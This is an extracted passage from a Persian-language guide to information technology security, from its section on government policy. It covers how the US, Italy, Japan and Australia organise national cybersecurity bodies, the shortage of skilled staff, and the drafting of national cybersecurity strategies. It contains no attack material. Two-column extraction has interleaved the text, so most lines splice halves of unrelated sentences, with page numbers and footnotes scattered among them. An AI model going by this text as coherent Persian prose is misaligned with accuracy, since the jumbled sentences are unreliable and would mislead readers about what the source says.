‫ﺍﺯ ﺑﻌﻀﻲ ﻣﻨﻈﺮﻫﺎ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻣﺪﻝ ﭘﻴﭽﻴﺪﻩﺍﻱ ﺑﺮﺍﻱ ﻫﻤﻜﺎﺭﻳﻬﺎ ﺩﺍﺭﺩ‬ ‫‪۲۵‬‬
‫ﻭ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﻟﮕﻮﻱ ﺧﻮﺑﻲ ﺑﺮﺍﻱ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﻧﺒﺎﺷﺪ‪ .‬ﺩﺭ‬ ‫ﻓﺮﻣﺎﻧﺪﻫﻲ ﻭ ﺳﺎﺯﻣﺎﻥ‬
‫ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ "ﻛﻤﻴﺘﻪ ﺍﻣﻨﻴﺖ ﻣﻠﻲ" ﻣﺴﺌﻮﻝ ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪ‪-‬‬
‫ﺍﻱ ﺩﺭ ﺑﺨﺶ ﺩﻭﻟﺘـﻲ ﻭ ﺑﺨـﺶ ﺧـﺼﻮﺻﻲ ﺍﺳـﺖ‪ ،‬ﺍﻣـﺎ ﻣﺮﻛـﺰ ﺩﻭﻟﺘـﻲ‬ ‫ﺗﻤﻬﻴﺪ ﺳﺎﺧﺘﺎﺭ ﻣﻠﻲ ﺑﺮﺍﻱ ﻣﺴﺌﻠﻪ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺩﻭﻟـﺖ ﺭﺍ ﺑـﺎ‬
‫ﻣﺪﻳﺮﻳﺖ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﻣﺴﺌﻮﻟﻴﺖ ﺑﺮﻧﺎﻣﻪﺭﻳـﺰﻱ ﺑـﺮﺍﻱ ﺳﻴـﺴﺘﻤﻬﺎﻱ‬ ‫ﭼﺎﻟﺸﻬﺎﻱ ﺳﺎﺯﻣﺎﻧﻲ ﺍﺯ ﺟﻤﻠـﻪ ﭼﮕـﻮﻧﮕﻲ ﺭﻫﺒـﺮﻱ ﺍﻳـﻦ ﺳـﺎﺧﺘﺎﺭ‬
‫ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﻭﻟﺖ ﺭﺍ ﺑﻪ ﺩﻓﺘﺮ ﻣﺪﻳﺮﻳﺖ ﻭ ﺑﻮﺩﺟﻪﺑﻨﺪﻱ ﻛـﺎﺥ ﺳـﻔﻴﺪ ﺩﺍﺩﻩ‪ ،‬ﻭ‬
‫ﺷــﻮﺭﺍﻱ ﺍﻣﻨﻴــﺖ ﻣﻠــﻲ ﺩﺭ ﻛــﺎﺥ ﺳــﻔﻴﺪ ﻧﻴــﺰ ﻣــﺴﺌﻮﻟﻴﺖ ﻫﻤﻜــﺎﺭﻱ ﺩﺭ‬
‫ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻱ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺭﺍ ﺑﺮ ﻋﻬﺪﻩ ﺩﺍﺭﺩ‪.‬‬ ‫‪19‬‬ ‫‪E-Government‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٢٣٦‬‬

‫ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﻪ ﻭﺯﺍﺭﺗﺨﺎﻧﻪﻫﺎﻱ ﻣﻮﺟﻮﺩ ﻣﻲ ﺍﻧﺪﻳﺸﻴﻢ‪ ،‬ﺳﺆﺍﻻﺕ‬ ‫ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﺍﺟﺮﺍﻳﻲ ﻛﻪ ﺗﻮﺳﻂ ﺍﺩﺍﺭﺓ ﻣﻠﻲ ﺑـﺮﺍﻱ ﺍﻗﺘـﺼﺎﺩ‬
‫ﺳﺎﺯﻣﺎﻧﻲ ﻣﻬﻤﻲ ﭘﻴﺶ ﻣﻲﺁﻳﻨﺪ ﻛﻪ ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﺁﻧﻬﺎ ﭘﺎﺳﺦ ﻣﻨﺎﺳـﺐ‬ ‫ﺍﻃﻼﻋﺎﺗﻲ ﺍﻳﺠﺎﺩ ﺷﺪﻩ ﻭ ﺗﺤﺖ ﻧﻈﺎﺭﺕ ﻭﺯﺍﺭﺕ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻭ‬
‫‪٢٦‬‬
‫ﭘﻴﺪﺍ ﻛﺮﺩ‪ .‬ﭼﻨﺎﻧﭽﻪ ﺗﻨﻬﺎ ﺍﺧﺘﻴـﺎﺭ ﺳـﺎﺯﻣﺎﻥ ﻫـﺪﺍﻳﺖﻛﻨﻨـﺪﺓ ﺍﻣﻨﻴـﺖ‬ ‫ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫ﺳﺎﻳﺒﺮ ‪ ،‬ﺗﺮﻏﻴﺐ ﻣﺮﺩﻡ ﻭ ﺍﻧﺘﺸﺎﺭ ﺍﻃﻼﻋـﺎﺕ ﺑـﺮﺍﻱ ﻋﻤـﻮﻡ ﺑﺎﺷـﺪ‪،‬‬ ‫ﺍﻳﺘﺎﻟﻴﺎ ﻳﻚ ﻛﻤﻴﺘﺔ ﺩﺍﺧﻠﻲ ﻭﺯﺍﺭﺗﻲ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﺓ ﻣﺴﺌﻮﻻﻧﻪ‬ ‫•‬
‫ﺍﺧﺘﻴﺎﺭ ﻋﻤﻠﻲ ﺁﻥ ﺩﺭ ﺣﻮﺯﺓ ﺍﻣﻨﻴﺖ ﺳـﺎﻳﺮ ﻭﺯﺍﺭﺗﺨﺎﻧـﻪﻫـﺎ ﻣﺤـﺪﻭﺩ‬ ‫ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮﻗﺮﺍﺭ ﺳﺎﺧﺘﻪ ﻛﻪ ﺗﻮﺳﻂ ﺩﭘﺎﺭﺗﻤـﺎﻥ ﻧـﻮﺁﻭﺭﻱ ﻭ‬
‫ﺧﻮﺍﻫﺪ ﺑﻮﺩ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﺑﺎﻳﺪ ﺭﻭﺷﻬﺎﻳﻲ ﺑﻮﺟﻮﺩ ﺁﻳﻨﺪ ﻛﻪ ﺑـﻪ ﺭﻫﺒـﺮﺍﻥ‬ ‫ﻓﻨﺎﻭﺭﻱ ﺩﺭ ﺩﻓﺘﺮ ﻧﺨﺴﺖ ﻭﺯﻳﺮﻱ ﻣﺪﻳﺮﻳﺖ ﻣﻲﮔﺮﺩﺩ‪.‬‬
‫ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺍﺟـﺎﺯﻩ ﺩﻫﻨـﺪ ﺍﻣﻨﻴـﺖ ﺭﺍ ﺩﺭ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﻣﻮﺟـﻮﺩ‬
‫ﺳﺎﺯﻣﺎﻧﻬﺎ ﻭ ﻭﺯﺍﺭﺗﺨﺎﻧﻪ ﻫﺎ ﺑﺮﻗﺮﺍﺭ ﺳﺎﺯﻧﺪ‪ .‬ﻳـﻚ ﺭﻭﺵ ﺑـﺮﺍﻱ ﺍﻟـﺰﺍﻡ‬ ‫ﺩﺭ ﺳــﺎﻝ ‪ ۲۰۰۰‬ﻧﺨــﺴﺖ ﻭﺯﻳــﺮ ﮊﺍﭘــﻦ ﮔﺮﻭﻫــﻲ ﺭﺍ ﺑــﺮﺍﻱ‬ ‫•‬

‫ﻭﺯﺍﺭﺗﺨﺎﻧﻪﻫﺎ ﺑـﻪ ﻣﻮﺍﻓﻘـﺖ ﺑـﺎ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ‬ ‫ﭘﺮﺩﺍﺧﺘﻦ ﺑﻪ ﻣﺴﺌﻠﻪ ﺍﻣﻨﻴﺖ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﺩﺭ ﻛﺎﺑﻴﻨـﺔ‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﺍﻳﻦ ﺑﺎﺷﺪ ﻛـﻪ ﻳـﻚ ﻣﻘـﺎﻡ ﻣـﺴﺌﻮﻝ ﺩﺭ ﺍﺩﺍﺭﺓ ﻣﺮﻛـﺰﻱ‬ ‫ﺩﻭﻟﺖ ﺍﻳﺠﺎﺩ ﻛﺮﺩ ﺗﺎ ﺑﻬﺘـﺮ ﺑﺘﻮﺍﻧـﺪ ﻣﻌﻴﺎﺭﻫـﺎ ﻭ ﺳﻴﺎﺳـﺘﻬﺎﻱ‬
‫ﺍﻣﻨﻴﺖ ﺩﺭ ﺩﻭﻟﺖ ﺑﺘﻮﺍﻧﺪ ﺳﻔﺎﺭﺷﺎﺕ ﺧﺮﻳﺪ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻭﻟﺘﻲ ﻛﻪ ﺍﺯ‬ ‫ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﻣﻴﺎﻥ ﻭﺯﻳﺮﺍﻥ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ ﻫﻤﺎﻫﻨﮓ ﻧﻤﺎﻳﺪ‪ .‬ﺍﻳـﻦ‬
‫ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺗﺒﻌﻴﺖ ﻧﻜﺮﺩﻩﺍﻧﺪ ﺭﺍ ﺭﺩ ﻛﻨﺪ‪.‬‬ ‫ﮔﺮﻭﻩ ﻣﺘﺸﻜﻞ ﺍﺯ ﻣﺘﺨﺼﺼﺎﻧﻲ ﺑﻮﺩ ﻛﻪ ﻋـﻀﻮ ﺳـﺎﺯﻣﺎﻧﻬﺎ ﻭ‬
‫‪٢٧‬‬
‫ﻭﺯﺍﺭﺗﺨﺎﻧﻪﻫﺎﻱ ﻭﺍﺑﺴﺘﻪ ﻭ ﻧﻴﺰ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺑﻮﺩﻧﺪ‪.‬‬
‫ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺗﺎ ﺣﺪﻱ ﺍﻳـﻦ ﺭﻭﺵ ﺭﺍ ﺩﺭ ﭘـﻴﺶ ﮔﺮﻓﺘـﻪ ﻭ ﺣـﻖ‬
‫ﺗﺄﻳﻴــﺪ ﻳــﺎ ﺭﺩ ﻫﺰﻳﻨــﻪﻫــﺎﻱ ﺳــﺮﻣﺎﻳﻪﮔــﺬﺍﺭﻱ ﺭﻭﻱ ﺳﻴــﺴﺘﻤﻬﺎﻱ‬ ‫ﺍﻧﺘﺨﺎﺏ ﻣﺤﻞ ﻓﺮﻣﺎﻧﺪﻫﻲ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﺩﻭﻟـﺖ ﺍﻫﻤﻴـﺖ‬
‫ﺭﺍﻳﺎﻧﻪﺍﻱ ‪ -‬ﺑﺎ ﻣﻼﺣﻈﺎﺕ ﻣﺨﺘﻠﻒ ﺍﺯ ﺟﻤﻠﻪ ﻣـﺴﺎﺋﻞ ﺍﻣﻨﻴﺘـﻲ ‪ -‬ﺭﺍ‬ ‫ﺯﻳﺎﺩﻱ ﺩﺍﺭﺩ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺗﺼﻤﻴﻢﮔﻴﺮﻱ ﺩﺭ ﻣﻮﺭﺩ ﺯﻣـﺎﻥ ﺍﻧﺘـﺸﺎﺭ‬
‫ﺑﺮ ﻋﻬـﺪﺓ ﺩﻓﺘـﺮ ﻣـﺪﻳﺮﻳﺖ ﻭ ﺑﻮﺩﺟـﻪﺑﻨـﺪﻱ ﺭﻳﺎﺳـﺖ ﺟﻤﻬـﻮﺭﻱ‬ ‫ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻣﻮﺭﺩ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺑـﺮﺍﻱ ﻋﻤـﻮﻡ‪،‬‬
‫ﮔﺬﺍﺷﺘﻪ ﺍﺳﺖ‪ .‬ﻳﻚ ﺍﻗﺪﺍﻡ ﺩﻳﮕﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺍﻟـﺰﺍﻡ ﻭﺯﺍﺭﺗﺨﺎﻧـﻪ ﻫـﺎ ﻭ‬ ‫ﻧﻴﺎﺯﻣﻨﺪ ﺑﺮﺭﺳﻴﻬﺎﻱ ﭼﻨﺪﺟﺎﻧﺒﻪ ﺍﺳﺖ‪ .‬ﻗﺮﺍﺭ ﺩﺍﺩﻥ ﺍﻳﻦ ﻣﺴﺌﻮﻟﻴﺖ ﺩﺭ‬
‫ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻭﻟﺘﻲ ﺑﻪ ﺍﺟﺮﺍﻱ ﻣﻤﻴـﺰﻱ ﺳـﺎﻻﻧﺔ ﺍﻣﻨﻴـﺖ ﺳـﺎﻳﺒﺮ ﻭ‬ ‫ﻻ ﻣﺴﺌﻮﻝ ﺣﻔﻆ ﺍﺳﺮﺍﺭ ﺍﻣﻨﻴﺖ ﻣﻠـﻲ ﺍﺳـﺖ‬ ‫ﻭﺯﺍﺭﺕ ﺩﻓﺎﻉ ﻛﻪ ﻣﻌﻤﻮ ﹰ‬
‫ﮔﺰﺍﺭﺵ ﻧﺘﺎﻳﺞ ﺁﻥ ﺑﻪ ﺍﺩﺍﺭﺓ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺑﺎﺷﺪ‪ .‬ﻫﺮ ﺳﺎﺧﺘﺎﺭﻱ ﻛـﻪ‬ ‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﻧﺘﺸﺎﺭ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺩﭼﺎﺭ ﺍﺧﺘﻼﻝ ﻛﻨﺪ ﻭ ﺑﺎﻋﺚ ﺷﻮﺩ‬
‫ﺍﻧﺘﺨـﺎﺏ ﺷـﻮﺩ‪ ،‬ﻣـﺪﻳﺮ ﺍﺭﺷـﺪ ﺁﻥ ﺑﺎﻳـﺪ ﺍﺯ ﻃـﺮﻑ ﺩﻓﺘـﺮ ﺭﻳﺎﺳـﺖ‬ ‫ﻣﻄﺎﻟﺐ ﻛﺎﻓﻲ ﺑﺮﺍﻱ ﺑﺎﻻ ﺑﺮﺩﻥ ﺳﻄﺢ ﺁﮔﺎﻫﻴﻬﺎﻱ ﻋﻤﻮﻣﻲ ﻣﻨﺘـﺸﺮ‬
‫ﺟﻤﻬﻮﺭﻱ ﻳﺎ ﻧﺨﺴﺖ ﻭﺯﻳﺮﻱ ﺗﻌﻴـﻴﻦ ﮔـﺮﺩﺩ ﺗـﺎ ﺗﻤـﺎﻣﻲ ﺍﺩﺍﺭﺍﺕ ﻭ‬ ‫ﻧﺸﻮﺩ‪ .‬ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻫﻤﻜﺎﺭﻱ ﺑﺨﺶ ﺩﻭﻟﺘـﻲ ﻭ ﺑﺨـﺶ ﺧـﺼﻮﺻﻲ‬
‫ﺳﺎﺯﻣﺎﻧﻬﺎ ﺁﻧﺮﺍ ﺟﺪﻱ ﺑﮕﻴﺮﻧﺪ‪.‬‬ ‫ﺟﺰﺀ ﻣﻬﻤﻲ ﺍﺯ ﺁﻧﭽﻪ ﻛـﻪ ﻣﻌﺘﻘـﺪﻳﻢ ﻣـﺆﺛﺮﻳﻦ ﺍﺳـﺘﺮﺍﺗﮋﻱ ﺍﻣﻨﻴـﺖ‬
‫ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﺍﺳﺖ ﻣﻲﺑﺎﺷﺪ‪ ،‬ﺷﺎﻳﺪ ﺑﻬﺘﺮ ﺑﺎﺷﺪ ﺭﻫﺒﺮﻱ ﺍﻣﻨﻴﺖ ﺳـﺎﻳﺒﺮ‬
‫ﭼﺎﻟﺶ ﺳﺎﺯﻣﺎﻧﻲ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﺩﻭﻟﺖ‪ ،‬ﻣﺸﻜﻞ ﻣﻨﺎﺑﻊ ﺍﻧﺴﺎﻧﻲ ﺍﺳـﺖ‪.‬‬ ‫ﺩﺭ ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﺍﻗﺘﺼﺎﺩﻱ ﻳﺎ ﺷﺮﻛﺖ ﻭﺍﺑﺴﺘﻪ ﺑﻪ ﺩﻭﻟـﺖ ﻭ ﺗﺤـﺖ‬
‫ﺩﻭﻟﺘﻬﺎ ﺑﺮﺍﻱ ﺟﺬﺏ ﻭ ﻧﮕﻬـﺪﺍﺭﻱ ﭘﺮﺳـﻨﻞ ﻣﺘﺨـﺼﺺ ﺩﺭ ﺯﻣﻴﻨـﺔ‬ ‫ﻧﻈﺎﺭﺕ ﺑﺎﻻﺗﺮﻳﻦ ﻣﻘﺎﻡ ﺍﺟﺮﺍﻳﻲ ﻛﺸﻮﺭ ﻗﺮﺍﺭ ﮔﻴﺮﺩ‪.‬‬
‫ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣﺸﻜﻞ ﺩﺍﺭﻧﺪ‪ .‬ﻳﻜﻲ ﺍﺯ ﺭﺍﻩﺣﻠﻬﺎ ﻣـﻲﺗﻮﺍﻧـﺪ ﺍﺭﺍﺋـﻪ‬
‫ﺑﻮﺭﺱ ﺗﺤﺼﻴﻠﻲ ﺑﺮﺍﻱ ﻣﻄﺎﻟﻌﺎﺕ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺑﺎﺷـﺪ ﻛـﻪ ﺑـﺎ‬ ‫ﺍﻣﺎ ﻣﻬﻤﺘﺮ ﺍﺯ ﺍﻳﻨﻜﻪ ﻛﺪﺍﻡ ﺳﺎﺯﻣﺎﻥ ﻳـﺎ ﺳـﺎﺯﻣﺎﻧﻬﺎ ﺑﺎﻳـﺪ ﻣـﺴﺌﻮﻟﻴﺖ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻦ ﺑﻮﺭﺳﻬﺎ‪ ،‬ﺍﻓﺮﺍﺩ ﺑـﺮﺍﻱ ﺳـﺎﻟﻬﺎﻱ ﻣﺸﺨـﺼﻲ ﺗﻌﻬـﺪ‬ ‫ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺭﺍ ﺑﺮ ﻋﻬﺪﻩ ﮔﻴﺮﻧﺪ ﺍﻳﻦ ﺍﺳـﺖ ﻛـﻪ ﺑﺎﻳـﺪ ﻧـﻮﻋﻲ‬
‫ﺧﺪﻣﺖ ﺑﻪ ﺩﻭﻟﺖ ﭘﻴﺪﺍ ﺧﻮﺍﻫﻨﺪ ﻛﺮﺩ‪ .‬ﻳﻚ ﺭﺍﻩﺣﻞ ﻛﻮﺗﺎﻩﻣﺪﺕ ﻧﻴـﺰ‬ ‫"ﻓﺮﻣﺎﻧﺪﻫﻲ ﻣﻠﻲ" ﺍﻳﺠﺎﺩ ﺷﻮﺩ ﺗﺎ ﺑﺘﻮﺍﻥ ﻛﺴﺐ ﺍﻃﻤﻴﻨﺎﻥ ﻛـﺮﺩ ﻛـﻪ‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﺍﺟﺮﺍﻱ ﺑﺮﻧﺎﻣـﻪﺍﻱ ﺩﻭ ﻣﺮﺣﻠـﻪﺍﻱ ﺑـﺎ ﻣـﺸﺎﺭﻛﺖ ﺑﺨـﺶ‬ ‫ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺍﺯ ﺳﻮﻱ ﺍﺟﺰﺍﻱ ﺩﻭﻟﺖ ﺑـﻪ ﺍﻧـﺪﺍﺯﺓ ﻛـﺎﻓﻲ ﻣـﻮﺭﺩ‬
‫ﺧﺼﻮﺻﻲ ﺑﺎﺷﺪ ﻛﻪ ﺩﺭ ﺁﻥ ﻣﺘﺨﺼﺼﺎﻥ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺑﺮﺍﻱ ﺩﻭﻟﺖ‬ ‫ﺗﻮﺟﻪ ﻗﺮﺍﺭ ﺧﻮﺍﻫـﺪ ﮔﺮﻓـﺖ‪ .‬ﻫﻨﮕﺎﻣﻴﻜـﻪ ﺑـﻪ ﻭﺍﺭﺩ ﻛـﺮﺩﻥ ﻣﻘﻮﻟـﺔ‬
‫ﻛﺎﺭ ﻛﻨﻨﺪ‪ ،‬ﺍﻣﺎ ﺗﻤﺎﻡ ﻳﺎ ﺑﺨـﺸﻲ ﺍﺯ ﺣﻘﻮﻗـﺸﺎﻥ ﺗﻮﺳـﻂ ﻛﺎﺭﻓﺮﻣـﺎﻱ‬
‫ﻲ ﺁﻧﻬﺎ ﭘﺮﺩﺍﺧﺖ ﮔﺮﺩﺩ‪ .‬ﻣﺸﻜﻞ ﻣﻨـﺎﺑﻊ ﺍﻧـﺴﺎﻧﻲ ﺩﺭ‬ ‫ﺑﺨﺶ ﺧﺼﻮﺻ ﹺ‬ ‫ﻃﺒﻖ ﻗﻮﺍﻧﻴﻦ ﺍﺳﺘﺮﺍﻟﻴﺎ‪ ،‬ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﺍﺟﺮﺍﻳـﻲ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﻏﻴـﺮ ﺟﺰﺍﻳـﻲ‬ ‫‪۲۶‬‬
‫ﺍﻣﻨﻴــﺖ ﺳــﺎﻳﺒﺮ ﻫــﻢ ﺩﺭ ﻛــﺸﻮﺭﻫﺎﻱ ﺗﻮﺳــﻌﻪﻳﺎﻓﺘــﻪ ﻭ ﻫــﻢ ﺩﺭ‬ ‫ﻫﺴﺘﻨﺪ ﻭ ﻫﻨﮕﺎﻣﻲ ﻛﻪ ﻛﺎﺭ ﺳﺎﺯﻣﺎﻥ ﺩﺭ ﺣﻴﻄﻪ ﻛﻞ ﺩﻭﻟﺖ ﺑﺎﺷﺪ ﻭ ﻛﻤـﻲ‬
‫ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻨﺠﺮ ﺑﻪ ﻣﻮﺍﺟﻬﺔ ﺩﻭﻟـﺖ‬ ‫ﺍﺯ ﺳﺎﺧﺘﺎﺭ ﺩﻭﻟﺘﻲ ﻣﺴﺘﻘﻞ ﺑﺎﺷﻨﺪ‪ ،‬ﺑﺎﻳـﺪ ﺗﻮﺳـﻂ ﺑـﺎﻻﺗﺮﻳﻦ ﻣﻘـﺎﻡ ﺩﻭﻟﺘـﻲ‬
‫ﻣﺤﻠﻲ ﺗﺄﺳﻴﺲ ﺷﻮﻧﺪ‪ .‬ﺭﺋﻴﺲ ﺳﺎﺯﻣﺎﻥ ﺍﺟﺮﺍﻳﻲ ﺗﻮﺳﻂ ﻳـﻚ ﻭﺯﻳـﺮ ‪ -‬ﺩﺭ‬
‫ﺑﺎ ﻣﺸﻜﻞ ﺍﺳﺎﺳﻲ ﺩﻳﮕﺮﻱ ﺷﻮﺩ‪ ،‬ﭼﺮﺍﻛـﻪ ﺩﻭﻟـﺖ ﺩﺭ ﻣﻘﺎﻳـﺴﻪ ﺑـﺎ‬ ‫ﺍﻳﻨﺠﺎ ﻭﺯﻳﺮ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻭ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ‪ -‬ﻣﻨﺼﻮﺏ ﻣﻲﺷـﻮﺩ ﻭ ﺗﻨﻬـﺎ‬
‫ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﻧﻤﻲﺗﻮﺍﻧﺪ ﺑﻪ ﻣﺘﺨﺼﺼﻴﻦ ﺍﻳﻦ ﺭﺷـﺘﻪ ﺩﺳـﺘﻤﺰﺩ‬ ‫ﺑﻪ ﺍﻭ ﭘﺎﺳﺨﮕﻮﺳﺖ‪.‬‬
‫ﻗﺎﺑﻞ ﺗﻮﺟﻬﻲ ﺑﭙﺮﺩﺍﺯﺩ‪.‬‬ ‫ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﭘﺎﻳﮕﺎﻩ ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‪:‬‬ ‫‪۲۷‬‬
‫‪http://www.kantei.go.jp/foreign/it/security/2000‬‬
‫‪/0519taisei.html‬‬
‫‪٢٣٧‬‬ ‫ﺑﺨﺶ ﭼﻬﺎﺭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ‬

‫ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﻣﻠﻲ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺍﺯ ﺁﻥ ﺍﺳـﺘﻔﺎﺩﻩ‬ ‫ﺗﻬﻴﺔ ﺍﺳﺘﺮﺍﺗﮋﻱ ﻣﻠﻲ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ‬
‫ﻛﺮﺩﻩﺍﻧﺪ‪ ٢٩.‬ﺩﺭ ﺣﻘﻴﻘـﺖ ﺍﻣﻨﻴـﺖ ﻳـﻚ ﺟـﺰﺀ ﺍﺳـﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﻣﻠـﻲ‬
‫ﺭﻭﻧﺪ ﺗﻬﻴﺔ ﺍﺳﺘﺮﺍﺗﮋﻱ ﻣﻠﻲ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﻣﻲﺗﻮﺍﻧـﺪ ﺍﺑـﺰﺍﺭ ﻣـﺆﺛﺮﻱ‬
‫ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺍﺳﺖ ﻭ ﺍﺳﺘﺮﺍﺗﮋﻱ ﺍﻣﻨﻴـﺖ ﺳـﺎﻳﺒﺮ‬
‫ﺑﺎﺷﺪ ﺑﺮﺍﻱ ﺗﺼﻤﻴﻤﮕﻴﺮﻱ ﺩﺭ ﻣﻮﺭﺩ ﺍﻳﻨﻜﻪ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﻣـﺎﻟﻲ‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﻃﺮﻳـﻖ ﺍﺻـﻮﻝ ﺣﻘـﻮﻗﻲ ﻭ ﺭﻭﺷـﻬﺎﻱ ﻣـﺸﺎﺑﻪ ﻣـﻮﺭﺩ‬
‫ﺍﻣﻨﻴﺖ ﺳـﺎﻳﺒﺮ ﻣﻠـﻲ ﭼﻴـﺴﺘﻨﺪ‪ ،‬ﻣـﺴﺌﻮﻟﻴﺘﻬﺎﻱ ﺩﻭﻟـﺖ ﺑﺎﻳـﺪ ﭼـﻪ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺩﺭ ﺗﻬﻴـﻪ ﭘـﻴﺶﻧـﻮﻳﺲ ﺑﺮﻧﺎﻣـﺔ ﻣﻠـﻲ ﺗﻮﺳـﻌﻪ ﻓﻨـﺎﻭﺭﻱ‬
‫ﭼﻴﺰﻫﺎﻳﻲ ﺑﺎﺷﺪ‪ ،‬ﻭ ﭼﻪ ﺳﻴﺎﺳـﺘﻬﺎ ﻭ ﺍﺻـﻼﺣﺎﺗﻲ ﺩﺭ ﻗﺎﻧﻮﻧﮕـﺬﺍﺭﻱ‬
‫ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺑﻜﺎﺭ ﮔﺮﻓﺘﻪ ﺷﻮﺩ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜـﺎﻝ ﮊﺍﭘـﻦ ﺩﺭ‬
‫ﺑﺎﻳﺪ ﺩﻧﺒﺎﻝ ﺷﻮﺩ‪ .‬ﺍﻳﻦ ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎ ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺭﺗﺒﺎﻁ ﻣﻴﺎﻥ‬
‫ﻣــﺎﺭﺱ ‪ ۲۰۰۱‬ﺍﻣﻨﻴــﺖ ﺳــﺎﻳﺒﺮ ﺭﺍ ﺩﺭ ﺑﺮﻧﺎﻣــﺔ ﺍﻭﻟﻮﻳــﺖﺑﻨــﺪﻱ‬
